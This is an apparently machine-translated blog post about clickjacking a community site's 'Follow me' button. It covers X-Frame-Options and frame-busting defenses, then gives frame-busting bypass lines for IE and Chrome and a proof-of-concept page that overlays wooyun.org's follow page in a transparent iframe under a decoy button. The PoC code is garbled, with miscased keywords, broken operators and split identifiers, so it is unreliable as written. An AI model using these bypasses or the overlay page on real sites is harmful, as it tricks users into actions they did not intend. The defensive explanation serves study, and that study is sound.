"Follow me"

It mainly refers to the "clickjacking" that has been missing for many years and has not been taken seriously ".

Application scenarios:
1. CommunityFollow-up functionIn the web era, "Pay attention to me" has become a necessary function in the community. The more people are concerned, the more influential they are in the community.

Click hijacking:
Simply put, you can embed a website to attack in a Web page, set the embedded website to transparent, and then overwrite a layer of content, let you point to the location where he wants you to, and in fact, the website that you click is indeed embedded, This completes a click hijacking attack.

Anti-embed? How can this problem be solved?
Because "Click hijacking" has been around for many years, most mainstream browsers provide defense solutions.
1. X-Frame-Options http Response Header
Three options:
(1) DENY: cannot be embedded into any website.
(2) SAMEORIGIN: allows the website with the same source to be embedded.
(3) ALLOW-FROM uri: uri is a specified address. Only this uri can be embedded.
There is no good solution for websites that use this method, but earlier versions of ie do not support it.

2. FrameBusting
In short, it is to use JS to detect whether it is embedded.
Classic framebuting code:
if (top.location !== self.location) top.location=self.location;
For suchFramebuting can still be hackingOf:
1. Breakthrough methods in IE:
if(self.ActiveXObject)var location={};
2. The Breakthrough method in Chrome will occasionally expire, because it uses time competition to break through:
if(self.chrome)setInterval('location="javascript:void(0)"');//Chrome
Wooyun uses the classic framebusting, so here we use wooyun as an example.

POC of wooyun's "Follow me" function:
<script>
var xx=200;
var yy=200;
window.onload=function (e){
var iframe = document.getElementById('xxx');
var e = e||window.event;

Var x=e.clientx?document.body.scrollleft?document.doc umentElement. scrollLeft;
Var ye.e.clienty?document.body.scrolltop=document.doc umentElement. scrollTop;

Iframe. style. left = a. offsetLeft-xx;
Iframe. style. top = a. offsetTop-yy;
}
Www.2cto.com

</Script>
<Script>
If (self. ActiveXObject) var location ={}; // IE
If (self. chrome) setInterval ('location = "javascript: void (0)" '); // Chrome
</Script>
<Iframe style = "position: absolute; opacity: 0.5; filter: alpha (opacity = 50); z-index: 1; "id = xxx src =" http://www.wooyun.org/whitehats/Sogili” WIDTH = 60% height = 500> </iframe>
<Br> </br> <center> <button id = a> click </button> </ center>
Call the iframe address if you use it. The values of the two variables, width, height, and xx and yy, are good.